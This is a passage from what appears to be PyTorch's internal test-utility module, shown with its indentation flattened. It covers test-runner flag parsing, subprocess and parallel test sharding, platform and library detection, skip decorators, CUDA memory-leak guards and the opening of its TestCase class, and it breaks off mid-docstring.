# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
elif TEST_IN_SUBPROCESS:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
failed_tests = []
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
exitcode = shell([sys.executable] + argv + [test_case_full_name])
if exitcode != 0:
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "avx512vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name):
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic):
self.deterministic = deterministic
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
torch.use_deterministic_algorithms(self.deterministic)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(self.deterministic_restore)
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(torch.are_deterministic_algorithms_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError as te:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# we don't need CUDA synchronize because the statistics are not tracked at
# actual freeing, but at when marking the block as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
def run(self, result=None):
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built-up on
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
